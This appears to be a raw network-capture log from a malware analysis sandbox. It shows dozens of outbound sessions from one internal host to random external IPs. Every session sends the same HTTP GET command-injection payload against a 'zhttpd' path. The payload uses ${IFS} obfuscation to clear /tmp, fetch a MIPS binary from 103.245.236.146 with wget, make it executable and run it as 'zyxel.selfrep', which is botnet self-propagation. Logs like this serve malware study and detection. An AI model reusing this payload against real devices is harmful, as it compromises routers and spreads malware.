                                                Jan 28, 2024 10:16:12.615957975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1057192.168.2.2339036154.180.216.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615957975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1058192.168.2.2334652126.45.129.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.615991116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1059192.168.2.2345046217.167.34.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616014004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1060192.168.2.235650260.231.150.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616034985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1061192.168.2.2337586117.106.42.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616069078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1062192.168.2.235923069.195.227.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616097927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1063192.168.2.2338628195.66.23.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616113901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1064192.168.2.2357210199.148.50.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616127014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1065192.168.2.2360184204.224.84.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616139889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1066192.168.2.2347010198.71.114.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616169930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1067192.168.2.2345326182.91.93.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616224051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1068192.168.2.235508220.127.132.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616244078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1069192.168.2.2354832189.38.38.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616266012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1070192.168.2.235086870.236.6.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616317034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1071192.168.2.233280844.10.186.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616319895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1072192.168.2.235936823.231.254.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616332054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1073192.168.2.2343018147.123.166.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616354942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1074192.168.2.2344218151.199.152.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616384983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1075192.168.2.2346956181.185.147.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616410017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1076192.168.2.2333636146.49.194.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616430044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1077192.168.2.235608890.90.63.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616449118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1078192.168.2.2346220203.204.176.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616482019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1079192.168.2.234671027.44.93.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616506100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1080192.168.2.2352326107.104.38.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616544008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1081192.168.2.234743027.173.246.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616575956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1082192.168.2.234829657.245.206.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616599083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1083192.168.2.2355116200.44.13.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616612911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1084192.168.2.233843661.43.152.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616637945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1085192.168.2.233465660.240.18.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616698027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1086192.168.2.2341870196.35.226.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616713047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1087192.168.2.235195476.133.141.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616736889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1088192.168.2.234593290.20.78.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616775036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1089192.168.2.2341212219.251.246.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616801023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1090192.168.2.2344772124.190.38.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616810083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1091192.168.2.234243459.56.48.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616839886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1092192.168.2.2333666221.126.135.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616873980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1093192.168.2.2343340167.200.92.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616887093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1094192.168.2.233851896.224.22.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616899967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1095192.168.2.233545623.238.183.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616899967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1096192.168.2.2359880189.162.186.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616930962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1097192.168.2.234085240.184.190.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616933107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1098192.168.2.235922270.251.127.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616966963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1099192.168.2.2351960150.44.243.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.616991043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1100192.168.2.2336652114.56.69.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617019892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1101192.168.2.2356446100.236.49.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617055893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1102192.168.2.23384122.125.54.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617077112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1103192.168.2.2333124190.115.147.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617108107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1104192.168.2.233721653.80.115.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617109060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1105192.168.2.233970244.116.148.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617161989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1106192.168.2.2338912181.216.107.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617188931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1107192.168.2.235756831.175.56.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617194891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1108192.168.2.2354616150.101.61.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617212057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1109192.168.2.2347126133.161.31.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617264032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1110192.168.2.2340158211.206.55.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617305994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1111192.168.2.234623213.124.21.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617327929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1112192.168.2.235864081.173.55.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617371082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1113192.168.2.234643094.99.135.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617383003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1114192.168.2.235063899.251.127.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617388964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1115192.168.2.2338752141.180.192.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617388964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1116192.168.2.2344100212.228.179.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617428064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1117192.168.2.2343074138.223.90.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617444038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1118192.168.2.2346732130.121.31.234443
                                                TimestampBytes transferredDirectionData
